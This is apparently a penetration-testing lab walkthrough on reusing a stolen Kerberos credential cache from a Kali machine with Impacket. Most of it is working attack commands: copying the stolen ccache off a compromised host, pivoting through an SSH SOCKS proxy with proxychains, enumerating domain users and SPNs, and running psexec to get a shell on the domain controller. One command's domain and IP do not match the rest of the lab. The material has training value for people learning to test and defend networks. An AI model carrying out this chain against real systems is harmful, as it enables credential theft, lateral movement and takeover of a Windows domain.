Kerberos with Impacket

Let's assume that we have compromised a domain joined host (linuxvictim) and stolen a ccache file. Rather than perform any lateral movement from the linuxvictim box, we’ll execute our attack directly from our Kali system with Impacket

Copy stolen ccache

Copy our victim’s stolen ccache file to our Kali VM and set the KRB5CCNAME environment variable as we did previously on linuxvictim Credential Cache Files.

scp -i ssh_keys/root [email protected]:/tmp/krb5cc_minenow /tmp/krb5cc_minenow
export KRB5CCNAME=/tmp/krb5cc_minenow

This will allow us to use the victim’s Kerberos tickets as our own.

Install Kerberos client utilities (on Kali)

sudo apt install krb5-user

When prompted for a kerberos realm, we’ll enter “corp1.com”. This lets the Kerberos tools know which domain we’re connecting to.

We’ll need to add the domain controller IP to our Kali VM to resolve the domain properly. We can get the IP address of the domain controller from the linuxvictim VM.

host corp1.com

Edit /etc/hosts

Now that the client utilities are installed, the target domain controller (dc01.corp1.com) and the generic domain (corp1.com) need to be added to our /etc/hosts file.

127.0.0.1 localhost
192.168.120.40 controller
192.168.120.45 linuxvictim
192.168.120.5 CORP1.COM DC01.CORP1.COM

Setup SOCKS proxy

In order to use our Kerberos tickets, we will need to have the correct source IP, which in this case is the compromised linuxvictim host that is joined to the domain.

Because of this, we’ll need to setup a SOCKS proxy on linuxvictim and use proxychains on Kali to pivot through the domain joined host when interacting with Kerberos.

To do so, we’ll need to comment out the line for proxy_dns in /etc/proxychains4.conf to prevent issues with domain name resolution while using proxychains.

# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#
...
# Proxy DNS requests - no leak for DNS data
#proxy_dns
...

Set up a SOCKS server using ssh on the server we copied the ccache file from, which in our case is linuxvictim.

kali@kali:~$ ssh offsec@linuxvictim -D 1080

(The -D parameter specifies the port we’ll be using for proxychains)

Utilize Impacket

We can examine the list of domain users with GetADUsers.py.

proxychains python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all -k -no-pass -dc-ip 172.16.226.168 complyedge.com

Get a list of the SPNs available to our Kerberos user.

proxychains python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -k -no-pass -dc-ip 192.168.120.5 CORP1.COM/Administrator

If we want to gain a shell on the server, we can then run psexec with the following command.

proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py [email protected] -k -no-pass

Last updated 1 year ago